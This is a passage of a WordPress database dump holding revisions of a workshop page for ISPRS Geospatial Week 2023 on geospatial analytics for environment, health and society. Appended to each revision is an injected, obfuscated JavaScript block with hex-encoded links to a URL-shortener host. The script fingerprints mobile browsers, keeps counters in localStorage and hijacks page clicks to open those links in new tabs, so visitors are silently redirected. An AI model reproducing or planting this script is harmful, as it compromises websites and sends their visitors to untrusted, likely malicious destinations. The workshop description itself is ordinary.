function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:11:13','2022-12-07 04:11:13','',3427,'https://gsw2023.com/?p=3437',0,'revision','',0),
(3438,1,'2022-12-07 04:12:43','2022-12-07 04:12:43','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><u>Themes of the Workshop</u></strong></p>\n<p>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p><strong><u>Scientific Committee:</u></strong></p>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p><u>Supporting ISPRS Working Groups:</u></p>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<p><u><strong>Special Issue dedicated to the workshop:</strong> </u></p>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p>iyyanki@gmail.com</p>\n<p>ivm@ieee.org[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:12:43','2022-12-07 04:12:43','',3427,'https://gsw2023.com/?p=3438',0,'revision','',0),
(3439,1,'2022-12-07 04:13:38','2022-12-07 04:13:38','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><u>Themes of the Workshop</u></strong></p>\n<p>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling 